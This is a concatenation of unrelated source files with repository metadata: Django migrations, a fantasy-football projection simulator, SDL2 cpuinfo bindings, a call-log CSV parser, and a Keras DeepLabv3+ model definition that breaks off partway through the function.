ace559b46e79210154608496701d451bae6e9f1d | df21c2c16ecfb4a46b1d88b0474291ac67c8a05a | /app/migrations/0003_auto_20180708_1239.py | 5d2a0d3ed37768c660d5b76e1dec863b6836cb8e | [] | no_license | aditya2222/CatchUp | 245dc4d122be7d596f8928d32a33acbbd754a4f3 | 915363faf7b59c81da070a70f9587f177a20d695 | refs/heads/master | 2020-03-22T14:21:17.689064 | 2018-07-08T14:08:24 | 2018-07-08T14:08:24 | 140,172,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | # Generated by Django 2.0.7 on 2018-07-08 12:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: adds Post.CurrentUser and makes Post.UserName
    one-to-one with the auth user.  Do not edit by hand; create a follow-up
    migration for further schema changes."""

    dependencies = [
        ('app', '0002_auto_20180708_1219'),
    ]

    operations = [
        migrations.AddField(
            model_name='post',
            name='CurrentUser',
            field=models.CharField(blank=True, max_length=120, null=True),
        ),
        migrations.AlterField(
            model_name='post',
            name='UserName',
            field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
    ]
| [
"adityasingh222247@gmail.com"
] | adityasingh222247@gmail.com |
d57ea15208418d0ea15cbe608a80dddf6e7f5ef2 | 94531cbb9cba199f10e603d385f7480b77a18f2b | /myBlog/migrations/0001_initial.py | dc241084329a4b8f5747d6937e1b3bc9b6a7eec3 | [] | no_license | toufiqur-rahman/django_blog | 6419892c64a4bd4130351082b4fd44451816c265 | 1b0f1189d8d60b85cc35e1b8faaeae64b94f81a7 | refs/heads/master | 2020-03-28T09:45:48.000434 | 2018-09-10T18:55:43 | 2018-09-10T18:55:43 | 148,057,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | # Generated by Django 2.1.1 on 2018-09-05 17:45
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Auto-generated initial migration creating the Post model.  Do not edit
    by hand; create a new migration for schema changes."""

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('text', models.TextField()),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('published_date', models.DateTimeField(blank=True, null=True)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"toufique.jami@gmail.com"
] | toufique.jami@gmail.com |
3c21a9fe28c43de3e10ee1d30def42d702d74bff | 14c4a16e75b348be31a224818c8f8db62746345a | /run_projections.py | c085dbbba2a2024156eb579c1ef871f9804ff07d | [] | no_license | BenikaH/nflstats | c43bbfd3806343b5f1a4a5e55f3ee7b1c6285dd9 | 269ee69facd280b3bd1e4f6724c7f7dfafd16396 | refs/heads/master | 2020-03-27T12:06:26.035175 | 2018-08-25T18:42:07 | 2018-08-25T18:42:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,876 | py | #!/usr/bin/env python3
from get_player_stats import *
from playermodels.positions import *
from ruleset import *
from get_fantasy_points import get_points
import os.path
import argparse
import numpy as np
import numpy.random as rand
# return a player from a dataframe if a unique one exists, else return None
# we could make this a bit more robust and flexible and move it to tools.py
# (e.g. option to select by team)
def get_player_from_df(df, pname, pos=None, team=None):
    """Look up a single player row in *df* by name, optionally narrowed by
    position and/or team.

    Returns the unique matching row.  When no row matches and the name ends
    in 'Jr.'/'Sr.', the lookup is retried with the suffix stripped.  Returns
    None when nothing matches at all.
    """
    mask = df.player == pname
    if pos is not None:
        mask &= df.pos == pos
    if team is not None:
        mask &= df.team == team
    if mask.any():
        matches = df[mask]
        # the name (plus filters) is expected to identify exactly one row
        assert(len(matches) == 1)
        return matches.iloc[0]
    # no hit: the name may carry a generational suffix -- strip it and retry
    if pname[-3:].lower() in ('jr.', 'sr.'):
        return get_player_from_df(df, pname[:-3].strip(), pos=pos, team=team)
    return None
def main():
    """CLI driver for fantasy-football projections.

    Trains a per-player statistical model from historical game logs,
    optionally rescales its expected values to match expert consensus touch
    projections, simulates many seasons per player, and writes per-player
    fantasy-point distribution summaries to a CSV under data/.

    NOTE(review): `logging` and `pd` are presumably provided by the star
    imports at the top of the file -- confirm.
    """
    logging.getLogger().setLevel(logging.DEBUG)
    np.set_printoptions(precision=4)
    pd.options.display.precision = 2 # default is 6
    parser = argparse.ArgumentParser(description='generate projections')
    parser.add_argument('position', type=str, choices=['QB', 'RB', 'WR', 'TE'], help='which position to simulate')
    parser.add_argument('--ruleset', type=str, choices=['phys', 'dude', 'bro', 'nycfc'],
                        default='phys', help='which ruleset to use')
    parser.add_argument('--year',nargs='?', type=int, default=2018, help='what is the current year')
    # NOTE(review): argparse `type=bool` treats any non-empty string as True,
    # so "--expert-touch False" still yields True -- consider store_true/false.
    parser.add_argument('--expert-touch', nargs='?', type=bool, default=True, help='scale models to meet expert consensus for rush attempts and targets')
    parser.add_argument('--n-seasons',nargs='?', type=int, default=128, help='number of seasons to simulate')
    args = parser.parse_args()
    pos = args.position
    current_year = args.year
    # map the ruleset name to the ruleset object imported from `ruleset`
    if args.ruleset == 'phys':
        rules = phys_league
    if args.ruleset == 'dude':
        rules = dude_league
    if args.ruleset == 'bro':
        rules = bro_league
    if args.ruleset == 'nycfc':
        rules = nycfc_league
    scale_touch = args.expert_touch
    # get player index
    pidx = get_pos_players(pos)
    # players like Luck who didn't play last year will be ruled out here.
    # we have the expert list to compare to so we can allow another year back.
    pidx = pidx[(pidx['pos'] == pos) & (pidx['year_max'] >= current_year-2)]
    ngames = 16
    nseasons = args.n_seasons
    # get expert projections so we can adjust to touches
    expertdf = pd.read_csv('preseason_rankings/project_fp_{}_pre{}.csv'.format(pos.lower(), current_year))
    # any known suspension data
    sussdf = pd.read_csv('data/suspensions.csv')
    # data of expectation values to print out at the end (and possibly save)
    evdf = pd.DataFrame(columns=['player', 'pos'], dtype=int)
    np.random.seed(3490) # pick a constant seed so we can debug weird outcomes
    # for _,prow in pidx.iterrows():
    # iterate over the expert list (covers rookies with no history too)
    for _,exproj in expertdf.iterrows():
        pname = exproj['player']
        # skip players the experts project below 32 fantasy points
        if exproj['fp_projection'] < 32:
            logging.debug('skipping {} as irrelevant'.format(pname))
            continue
        # pname,pid = prow[['player', 'pfr_id']]
        logging.info('training model for {}'.format(pname))
        prow = get_player_from_df(pidx, pname)
        # exproj = get_player_from_df(expertdf, pname)
        # if exproj is None:
        #     # they are probably retired; let's not waste time simulating them
        #     logging.warning('no expert projection for {}. skipping.'.format(pname))
        #     continue
        pmod = gen_player_model(pos)
        # rookies/unknowns get an empty stats frame instead of a lookup
        pdf = get_player_stats(prow['pfr_id']).fillna(0) if prow is not None else pd.DataFrame(columns=['player', 'pos', 'team', 'year'])
        stat_vars = [model.pred_var for model in pmod.models]
        for st in stat_vars:
            if st not in pdf:
                pdf[st] = 0 # set non-existent values to zero
        years = pdf['year'].unique()
        # if len(years) == 0:
        # then we need to debug why this player isn't being read, tho this should be fine for rookies
        #     logging.error('  no player data for {}!'.format(pname))
        # years must already be sorted ascending
        assert((np.diff(years) > 0).all())
        # collect per-game percent errors vs. the player's season mean, used
        # below as a volatility estimate
        pcterrs = []
        for year in years:
            ydf = pdf[pdf['year'] == year]
            games = ydf['game_num']
            assert((np.diff(games) > 0).all()) # this sometimes fails when players are traded mid-week. we could just pick the one with the most points (so far just manually deleting)
            meanpts = get_points(rules, ydf).mean()
            for _,game in ydf.iterrows():
                # evs = pmod.evs() # expected outcome
                # expt = get_points(rules, evs) # works from dict too?
                if meanpts != 0:
                    actpt = get_points(rules, game)
                    pcterrs.append((actpt-meanpts)/meanpts)
                pmod.update_game(game)
            pmod.new_season()
        pcterrs = np.array(pcterrs)
        # NaN percent errors indicate bad input data -- bail out loudly
        if np.isnan(pcterrs).any():
            print(pcterrs)
            exit(1)
        # now we're done training; do simulations next
        # get the number of games a player is expected to play
        pgames = ngames # number of games this player expects to play. we'll check suspensions:
        psus = get_player_from_df(sussdf, pname, pos)
        if psus is not None:
            gsus = psus.games_suspended
            logging.info(psus.details)
            if not np.isnan(gsus):
                pgames -= int(gsus)
                logging.info(' -- {} game suspension'.format(gsus))
            else:
                logging.info('suspension time unknown.')
        # optionally pin the model's per-game expected touches to the expert
        # consensus (attempts directly; targets inferred from receptions)
        if scale_touch:
            re_ev_dict = {}
            for touchvar in set(stat_vars) & set(['pass_att', 'rush_att']):
                re_ev_dict[touchvar] = exproj[touchvar]/pgames
            if 'targets' in stat_vars:
                # expert projections from this source don't have targets, just receptions
                modevs = pmod.evs()
                re_ev_dict['targets'] = modevs['targets'] * exproj['rec'] / modevs['rec'] / pgames
            pmod.revert_evs(re_ev_dict)
        # if pname in ['Todd Gurley', 'Ezekiel Elliott', 'Le\'Veon Bell', 'Saquon Barkley', 'Royce Freeman']:
        # if pname in ['dDeAndre Hopkins', 'Odell Beckham Jr.']:
        #     print(pmod)
        # simulate nseasons seasons of pgames games each and score them
        fpdf = pd.concat([pd.DataFrame((pmod.gen_game() for _ in range(pgames))) for _ in range(nseasons)], ignore_index=True)
        # fps = pd.concat((get_points( rules, fpdf )), ignore_index=True)
        fps = get_points( rules, fpdf )
        # flag implausibly large simulated games for manual inspection
        largegames = fps > 50
        if largegames.any():
            print(pname)
            print(fpdf[largegames])
        # +/- 1 and 2 sigma quantiles of the per-game point distribution
        fp_2d,fp_1d,fp_med,fp_1u,fp_2u = fps.quantile((0.02275, 0.15865, 0.5, 0.84135, 0.97725))
        evdat = {key:(pgames*val) for key,val in pmod.evs().items()}
        evdat['player'] = pname
        evdat['pos'] = pos
        evdat['g'] = pgames
        evdat['ex_pred'] = exproj['fp_projection']
        evdat['fpts_ev'] = get_points( rules, evdat )
        evdat['fpts_sim'] = fps.mean()*pgames
        evdat['fpts_med'] = fp_med
        evdat['fpts_simstd'] = fps.std()*np.sqrt(pgames)
        # RMS of historical per-game percent errors
        evdat['volatility'] = np.sqrt(np.mean(pcterrs**2))
        if fp_med > 0:
            evdat['vol1'] = 0.5*(fp_1u - fp_1d)/fp_med
            evdat['vol2'] = 0.5*(fp_2u - fp_2d)/fp_med
        evdat['fpts_u1'] = fp_1u
        evdat['fpts_d1'] = fp_1d
        evdf = evdf.append(evdat, ignore_index=True)
    print(evdf.sort_values('fpts_ev', ascending=False))
    evdf.to_csv('data/{}_simulations_{}.csv'.format(pos.lower(), current_year), index=False)
    return
if __name__ == '__main__':
    # CLI entry point: parse arguments and run the projection simulations.
    main()
| [
"mfclark3690@gmail.com"
] | mfclark3690@gmail.com |
a5cd4ba759fc6e7df503e00af2402bb95ae28a44 | e7fa451c8fba591c0e0c25716d7fe72c8582345e | /Joystick ID Fixer/sdl2/cpuinfo.py | 4b6ed554ad6f0e3a917fee732251c22b77855ad5 | [
"MIT"
] | permissive | danricho/SC-Joystick-Configuration | 81d51eb3b94e70cc2b886ff92d0fa9cb7d30d764 | 7a0b463b348f7de0abad39702dae0100f9f935f0 | refs/heads/master | 2021-01-17T17:08:47.320006 | 2020-07-02T06:59:08 | 2020-07-02T06:59:08 | 62,977,107 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,137 | py | from ctypes import c_int
from .dll import _bind, nullfunc
from .stdinc import SDL_bool
# ctypes bindings for SDL2's CPU feature-detection API (SDL_cpuinfo.h).
# NOTE(review): _bind(name, argtypes, restype[, fallback]) presumably resolves
# the symbol from the loaded SDL2 shared library, with `nullfunc` as a
# fallback for symbols missing in older SDL2 builds -- confirm against .dll.
__all__ = ["SDL_CACHELINE_SIZE", "SDL_GetCPUCount", "SDL_GetCPUCacheLineSize",
           "SDL_HasRDTSC", "SDL_HasAltiVec", "SDL_HasMMX", "SDL_Has3DNow",
           "SDL_HasSSE", "SDL_HasSSE2", "SDL_HasSSE3", "SDL_HasSSE41",
           "SDL_HasSSE42", "SDL_GetSystemRAM", "SDL_HasAVX"
           ]
# Cache line size constant mirrored from SDL_cpuinfo.h (bytes).
SDL_CACHELINE_SIZE = 128
# Counters: number of logical CPU cores and the L1 cache line size.
SDL_GetCPUCount = _bind("SDL_GetCPUCount", None, c_int)
SDL_GetCPUCacheLineSize = _bind("SDL_GetCPUCacheLineSize", None, c_int)
# Boolean CPU-feature probes; each returns SDL_bool.
SDL_HasRDTSC = _bind("SDL_HasRDTSC", None, SDL_bool)
SDL_HasAltiVec = _bind("SDL_HasAltiVec", None, SDL_bool)
SDL_HasMMX = _bind("SDL_HasMMX", None, SDL_bool)
SDL_Has3DNow = _bind("SDL_Has3DNow", None, SDL_bool)
SDL_HasSSE = _bind("SDL_HasSSE", None, SDL_bool)
SDL_HasSSE2 = _bind("SDL_HasSSE2", None, SDL_bool)
SDL_HasSSE3 = _bind("SDL_HasSSE3", None, SDL_bool)
SDL_HasSSE41 = _bind("SDL_HasSSE41", None, SDL_bool)
SDL_HasSSE42 = _bind("SDL_HasSSE42", None, SDL_bool)
# These two appeared in later SDL2 releases, hence the nullfunc fallback.
SDL_GetSystemRAM = _bind("SDL_GetSystemRAM", None, c_int, nullfunc)
SDL_HasAVX = _bind("SDL_HasAVX", None, SDL_bool, nullfunc)
| [
"noreply@github.com"
] | noreply@github.com |
22e2e2406a80d650dca9e60eae4d61b3a850429a | a3d40bd366ea747c76bd8bd40d3a3bdfe617088c | /code for call records.py | d6a1b4c773fc0dde664948c096ff5f65bca49bde | [] | no_license | sshchan/gshdata | 258033f77b946f10a5c2c865f25317592d1934eb | c217249d432936b7b3ad92b4600db242f3e9bf64 | refs/heads/master | 2020-05-05T04:56:52.367318 | 2019-04-05T18:16:03 | 2019-04-05T18:16:03 | 179,731,557 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,859 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 4 14:31:43 2019
@author: user
"""
#
#import xlrd
#
#d = {}
#callLogsRec = xlrd.open_workbook('/C:/Users/user/AppData/Local/Temp/Temp1_GSH_19MAR2019.zip/FOR_UNCLASS/Phones (PARSED)/GSH_CallLogs.csv')
#callLogsexcel = callLogsRec.sheet_by_index(2)
#for i in range(16347):
# cell_value_number = callLogsexcel.cell(i,0).value
# cell_value_name = callLogsexcel.cell(i,1).value
# d[cell_value_number] = cell_value_name
#import csv
#
#with open('GSH_CallLogs.csv') as csvfile:
# reader = csv.reader(csvfile)
#
# mydict = {rows[0]:rows[1] for rows in reader}
import csv

# Read the parsed call-log export once.  Row layout (from the header):
# column 0 = phone number, column 1 = contact name, column 5 = call key.
# NOTE: the previous version also built an unused csv.reader with
# delimiter=' '/quotechar='|' before re-reading the file -- that dead
# reader has been removed.
with open('GSH_CallLogs.csv', newline = '', encoding = 'utf8') as csvfile:
    data = list(csv.reader(csvfile))

# Skip the header row (index 0) and pull out the columns of interest.
rows = data[1:]
numbers = [row[0] for row in rows]
print(numbers)
names = [row[1] for row in rows]
print(names)
call_num = [row[5] for row in rows]
print(call_num)
# Pair each phone number with its contact name.
num_and_names = [[digit, alias] for digit, alias in zip(numbers, names)]
print(num_and_names)
# Map the column-5 key to [number, name]; duplicate keys keep the last
# occurrence (dict() semantics), matching the original behaviour.
mappedDictionary = dict(zip(call_num, num_and_names))
print(mappedDictionary)
| [
"noreply@github.com"
] | noreply@github.com |
aba137d2ba8d09a62e8c31bd44e5e317756309e1 | 639493af246a2d00fc1ef8f17c4e666d11537677 | /Models/Deeplabv3.py | 405c8a07245f51e20436cc4f6aef3728eee90483 | [] | no_license | brillianti/Deeplabv3 | ab68ed7b5a29ccbbf8f27fec441c83f5186ba622 | f4aad6b112c2c629766ba54434ead4eb617ba0b8 | refs/heads/master | 2022-04-22T21:34:29.790094 | 2020-04-25T15:19:32 | 2020-04-25T15:19:32 | 258,806,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,086 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from keras.models import Model
from keras.activations import relu
from keras.layers import Conv2D, DepthwiseConv2D, UpSampling2D, ZeroPadding2D, Lambda, AveragePooling2D, Input, \
Activation, Concatenate, Add, Reshape, BatchNormalization, Dropout
from keras.engine import Layer, InputSpec
from keras.engine.topology import get_source_inputs
from keras import backend as K, layers
def SepConv_BN(x, filters, prefix, stride=1, kernel_size=3, rate=1, depth_activation=False, epsilon=1e-3):
    """ SepConv with BN between depthwise & pointwise. Optionally add activation after BN
    Implements right "same" padding for even kernel sizes
    Args:
        x: input tensor
        filters: num of filters in pointwise convolution
        prefix: prefix before name
        stride: stride at depthwise conv
        kernel_size: kernel size for depthwise convolution
        rate: atrous rate for depthwise convolution
        depth_activation: flag to use activation between depthwise & pointwise convs
        epsilon: epsilon to use in BN layer
    """
    if stride == 1:
        depth_padding = 'same'
    else:
        # Strided case: pad manually (accounting for the atrous rate) and run
        # the depthwise conv with 'valid' padding to avoid the 1-pixel drift
        # 'same' padding would introduce.
        kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)
        pad_total = kernel_size_effective - 1
        pad_beg = pad_total // 2
        pad_end = pad_total - pad_beg
        x = ZeroPadding2D((pad_beg, pad_end))(x)
        depth_padding = 'valid'
    # Without per-conv activations, apply a single ReLU before the pair.
    if not depth_activation:
        x = Activation('relu')(x)
    # depthwise conv -> BN (-> optional ReLU)
    x = DepthwiseConv2D((kernel_size, kernel_size), strides=(stride, stride), dilation_rate=(rate, rate),
                        padding=depth_padding, use_bias=False, name=prefix + '_depthwise')(x)
    x = BatchNormalization(name=prefix + '_depthwise_BN', epsilon=epsilon)(x)
    if depth_activation:
        x = Activation('relu')(x)
    # 1x1 pointwise conv -> BN (-> optional ReLU)
    x = Conv2D(filters, (1, 1), padding='same',
               use_bias=False, name=prefix + '_pointwise')(x)
    x = BatchNormalization(name=prefix + '_pointwise_BN', epsilon=epsilon)(x)
    if depth_activation:
        x = Activation('relu')(x)
    return x
def _conv2d_same(x, filters, prefix, stride=1, kernel_size=3, rate=1):
    """Conv2D with correct 'same' behaviour for even kernel sizes.

    For stride == 1 Keras' own 'same' padding is fine; for stride > 1 the
    input is zero-padded explicitly (accounting for the atrous rate) and the
    convolution runs with 'valid' padding, which avoids the 1-pixel drift at
    stride = 2.

    Args:
        x: input tensor
        filters: number of output filters
        prefix: layer name
        stride: convolution stride
        kernel_size: convolution kernel size
        rate: atrous (dilation) rate
    """
    if stride != 1:
        # symmetric-ish explicit padding for the dilated kernel
        effective_kernel = kernel_size + (kernel_size - 1) * (rate - 1)
        total_pad = effective_kernel - 1
        left_pad = total_pad // 2
        x = ZeroPadding2D((left_pad, total_pad - left_pad))(x)
    conv = Conv2D(filters,
                  (kernel_size, kernel_size),
                  strides=(stride, stride),
                  padding='same' if stride == 1 else 'valid',
                  use_bias=False,
                  dilation_rate=(rate, rate),
                  name=prefix)
    return conv(x)
def _xception_block(inputs, depth_list, prefix, skip_connection_type, stride,
                    rate=1, depth_activation=False, return_skip=False):
    """ Basic building block of modified Xception network
    Args:
        inputs: input tensor
        depth_list: number of filters in each SepConv layer. len(depth_list) == 3
        prefix: prefix before name
        skip_connection_type: one of {'conv','sum','none'}
        stride: stride at last depthwise conv
        rate: atrous rate for depthwise convolution
        depth_activation: flag to use activation between depthwise & pointwise convs
        return_skip: flag to return additional tensor after 2 SepConvs for decoder
    """
    # NOTE: the previous implementation declared ``global outputs, skip``,
    # which leaked these values into module scope (non-reentrant) and silently
    # reused stale globals when an unknown skip_connection_type was passed.
    # They are plain locals now, and bad input raises ValueError explicitly.
    skip = None
    residual = inputs
    # three stacked separable convs; only the last one is strided
    for i in range(3):
        residual = SepConv_BN(residual,
                              depth_list[i],
                              prefix + '_separable_conv{}'.format(i + 1),
                              stride=stride if i == 2 else 1,
                              rate=rate,
                              depth_activation=depth_activation)
        if i == 1:
            # tensor after the second SepConv, handed to the decoder on request
            skip = residual
    if skip_connection_type == 'conv':
        # 1x1 projection shortcut so channel counts match before the add
        shortcut = _conv2d_same(inputs, depth_list[-1], prefix + '_shortcut',
                                kernel_size=1,
                                stride=stride)
        shortcut = BatchNormalization(name=prefix + '_shortcut_BN')(shortcut)
        outputs = layers.add([residual, shortcut])
    elif skip_connection_type == 'sum':
        outputs = layers.add([residual, inputs])
    elif skip_connection_type == 'none':
        outputs = residual
    else:
        raise ValueError(
            "skip_connection_type must be one of 'conv', 'sum' or 'none', "
            "got {!r}".format(skip_connection_type))
    if return_skip:
        return outputs, skip
    else:
        return outputs
def _make_divisible(v, divisor, min_value=None):
if min_value is None:
min_value = divisor
new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)
# Make sure that round down does not go down by more than 10%.
if new_v < 0.9 * v:
new_v += divisor
return new_v
def _inverted_res_block(inputs, expansion, stride, alpha, filters, block_id, skip_connection, rate=1):
    """MobileNetV2 inverted-residual block: 1x1 expand -> 3x3 depthwise ->
    1x1 linear projection, with an optional residual add.

    Args:
        inputs: input tensor
        expansion: channel expansion factor for the 1x1 expand conv
        stride: stride of the depthwise conv
        alpha: width multiplier applied to `filters`
        filters: nominal number of output filters (before alpha scaling)
        block_id: index used in layer names; block 0 skips the expand conv
        skip_connection: if True, add the block input to its output
        rate: atrous (dilation) rate for the depthwise conv
    """
    in_channels = inputs._keras_shape[-1]
    # scale the output width by alpha and round to a multiple of 8
    pointwise_conv_filters = int(filters * alpha)
    pointwise_filters = _make_divisible(pointwise_conv_filters, 8)
    x = inputs
    prefix = 'expanded_conv_{}_'.format(block_id)
    if block_id:
        # Expand
        x = Conv2D(expansion * in_channels, kernel_size=1, padding='same',
                   use_bias=False, activation=None,
                   name=prefix + 'expand')(x)
        x = BatchNormalization(epsilon=1e-3, momentum=0.999,
                               name=prefix + 'expand_BN')(x)
        # x = Lambda(lambda x: relu(x, max_value=6.))(x)
        # ReLU6 via Lambda (Keras' Activation cannot express max_value here)
        x = Lambda(lambda x: relu(x, max_value=6.), name=prefix + 'expand_relu')(x)
        # x = Activation(relu(x, max_value=6.), name=prefix + 'expand_relu')(x)
    else:
        # the very first block has no expand stage
        prefix = 'expanded_conv_'
    # Depthwise
    x = DepthwiseConv2D(kernel_size=3, strides=stride, activation=None,
                        use_bias=False, padding='same', dilation_rate=(rate, rate),
                        name=prefix + 'depthwise')(x)
    x = BatchNormalization(epsilon=1e-3, momentum=0.999,
                           name=prefix + 'depthwise_BN')(x)
    # x = Activation(relu(x, max_value=6.), name=prefix + 'depthwise_relu')(x)
    x = Lambda(lambda x: relu(x, max_value=6.), name=prefix + 'depthwise_relu')(x)
    # linear (no activation) 1x1 projection back down to pointwise_filters
    x = Conv2D(pointwise_filters,
               kernel_size=1, padding='same', use_bias=False, activation=None,
               name=prefix + 'project')(x)
    x = BatchNormalization(epsilon=1e-3, momentum=0.999,
                           name=prefix + 'project_BN')(x)
    if skip_connection:
        return Add(name=prefix + 'add')([inputs, x])
    # if in_channels == pointwise_filters and stride == 1:
    #     return Add(name='res_connect_' + str(block_id))([inputs, x])
    return x
def Deeplabv3(nClasses=2,input_height=224, input_width=224):
    """ Instantiates the Deeplabv3+ architecture.

    NOTE: this port hard-codes several options that were parameters in the
    original implementation: backbone='xception', OS=16, alpha=1.0,
    input_tensor=None, and no pre-trained-weight loading (the weight-loading
    code is kept, commented out, at the end of the function).  The model's
    output is reshaped to (H*W, nClasses) and passed through a softmax, and
    the returned model carries `outputHeight`/`outputWidth` attributes.

    # Arguments
        nClasses: number of desired classes. If nClasses != 21,
            the last layer is initialized randomly.
        input_height: input image height (pixels).
        input_width: input image width (pixels).
    # Returns
        A Keras model instance.
    # Raises
        RuntimeError: If attempting to run this model with a
            backend that does not support separable convolutions.
        ValueError: in case of invalid argument for `backbone`
            (unreachable while backbone is hard-coded).
    """
    # hard-coded configuration (see docstring note)
    input_tensor = None
    backbone = 'xception'
    OS = 16
    alpha = 1.
    input_shape = (input_height, input_width, 3) #input_shape=(224,224,3)
    # NOTE(review): these globals leak atrous_rates/skip1 into module scope;
    # plain locals would suffice -- left as-is to avoid behaviour changes.
    global atrous_rates, skip1
    if K.backend() != 'tensorflow':
        raise RuntimeError('The Deeplabv3+ model is only available with '
                           'the TensorFlow backend.')
    if not (backbone in {'xception', 'mobilenetv2'}):
        raise ValueError('The `backbone` argument should be either '
                         '`xception` or `mobilenetv2` ')
    if input_tensor is None:
        img_input = Input(shape=input_shape)
    else:
        if not K.is_keras_tensor(input_tensor):
            img_input = Input(tensor=input_tensor, shape=input_shape)
        else:
            img_input = input_tensor
    # normalize pixel values from [0, 255] to [-1, 1]
    batches_input = Lambda(lambda x: x / 127.5 - 1)(img_input)
    if backbone == 'xception':
        # output-stride controls where striding stops and dilation begins
        if OS == 8:
            entry_block3_stride = 1
            middle_block_rate = 2  # ! Not mentioned in paper, but required
            exit_block_rates = (2, 4)
            atrous_rates = (12, 24, 36)
        else:
            entry_block3_stride = 2
            middle_block_rate = 1
            exit_block_rates = (1, 2)
            atrous_rates = (6, 12, 18)
        # entry flow
        x = Conv2D(32, (3, 3), strides=(2, 2),
                   name='entry_flow_conv1_1', use_bias=False, padding='same')(batches_input)
        x = BatchNormalization(name='entry_flow_conv1_1_BN')(x)
        x = Activation('relu')(x)
        x = _conv2d_same(x, 64, 'entry_flow_conv1_2', kernel_size=3, stride=1)
        x = BatchNormalization(name='entry_flow_conv1_2_BN')(x)
        x = Activation('relu')(x)
        x = _xception_block(x, [128, 128, 128], 'entry_flow_block1',
                            skip_connection_type='conv', stride=2,
                            depth_activation=False)
        # skip1 feeds the decoder's low-level feature branch
        x, skip1 = _xception_block(x, [256, 256, 256], 'entry_flow_block2',
                                   skip_connection_type='conv', stride=2,
                                   depth_activation=False, return_skip=True)
        x = _xception_block(x, [728, 728, 728], 'entry_flow_block3',
                            skip_connection_type='conv', stride=entry_block3_stride,
                            depth_activation=False)
        # middle flow: 16 identical residual units
        for i in range(16):
            x = _xception_block(x, [728, 728, 728], 'middle_flow_unit_{}'.format(i + 1),
                                skip_connection_type='sum', stride=1, rate=middle_block_rate,
                                depth_activation=False)
        # exit flow
        x = _xception_block(x, [728, 1024, 1024], 'exit_flow_block1',
                            skip_connection_type='conv', stride=1, rate=exit_block_rates[0],
                            depth_activation=False)
        x = _xception_block(x, [1536, 1536, 2048], 'exit_flow_block2',
                            skip_connection_type='none', stride=1, rate=exit_block_rates[1],
                            depth_activation=True)
    else:
        # MobileNetV2 backbone (dead while backbone is hard-coded to xception)
        OS = 8
        first_block_filters = _make_divisible(32 * alpha, 8)
        x = Conv2D(first_block_filters,
                   kernel_size=3,
                   strides=(2, 2), padding='same',
                   use_bias=False, name='Conv')(batches_input)
        x = BatchNormalization(
            epsilon=1e-3, momentum=0.999, name='Conv_BN')(x)
        x = Lambda(lambda x: relu(x, max_value=6.))(x)
        x = _inverted_res_block(x, filters=16, alpha=alpha, stride=1,
                                expansion=1, block_id=0, skip_connection=False)
        x = _inverted_res_block(x, filters=24, alpha=alpha, stride=2,
                                expansion=6, block_id=1, skip_connection=False)
        x = _inverted_res_block(x, filters=24, alpha=alpha, stride=1,
                                expansion=6, block_id=2, skip_connection=True)
        x = _inverted_res_block(x, filters=32, alpha=alpha, stride=2,
                                expansion=6, block_id=3, skip_connection=False)
        x = _inverted_res_block(x, filters=32, alpha=alpha, stride=1,
                                expansion=6, block_id=4, skip_connection=True)
        x = _inverted_res_block(x, filters=32, alpha=alpha, stride=1,
                                expansion=6, block_id=5, skip_connection=True)
        # stride in block 6 changed from 2 -> 1, so we need to use rate = 2
        x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1,  # 1!
                                expansion=6, block_id=6, skip_connection=False)
        x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1, rate=2,
                                expansion=6, block_id=7, skip_connection=True)
        x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1, rate=2,
                                expansion=6, block_id=8, skip_connection=True)
        x = _inverted_res_block(x, filters=64, alpha=alpha, stride=1, rate=2,
                                expansion=6, block_id=9, skip_connection=True)
        x = _inverted_res_block(x, filters=96, alpha=alpha, stride=1, rate=2,
                                expansion=6, block_id=10, skip_connection=False)
        x = _inverted_res_block(x, filters=96, alpha=alpha, stride=1, rate=2,
                                expansion=6, block_id=11, skip_connection=True)
        x = _inverted_res_block(x, filters=96, alpha=alpha, stride=1, rate=2,
                                expansion=6, block_id=12, skip_connection=True)
        x = _inverted_res_block(x, filters=160, alpha=alpha, stride=1, rate=2,  # 1!
                                expansion=6, block_id=13, skip_connection=False)
        x = _inverted_res_block(x, filters=160, alpha=alpha, stride=1, rate=4,
                                expansion=6, block_id=14, skip_connection=True)
        x = _inverted_res_block(x, filters=160, alpha=alpha, stride=1, rate=4,
                                expansion=6, block_id=15, skip_connection=True)
        x = _inverted_res_block(x, filters=320, alpha=alpha, stride=1, rate=4,
                                expansion=6, block_id=16, skip_connection=False)
    # end of feature extractor
    # branching for Atrous Spatial Pyramid Pooling
    # Image Feature branch
    # out_shape = int(np.ceil(input_shape[0] / OS))
    b4 = AveragePooling2D(pool_size=(int(np.ceil(input_shape[0] / OS)), int(np.ceil(input_shape[1] / OS))))(x)
    b4 = Conv2D(256, (1, 1), padding='same',
                use_bias=False, name='image_pooling')(b4)
    b4 = BatchNormalization(name='image_pooling_BN', epsilon=1e-5)(b4)
    b4 = Activation('relu')(b4)
    # upsample the pooled features back to the feature-map resolution
    b4 = Lambda(lambda x: K.tf.image.resize_bilinear(x, size=(
        int(np.ceil(input_shape[0] / OS)), int(np.ceil(input_shape[1] / OS)))))(b4)
    # simple 1x1
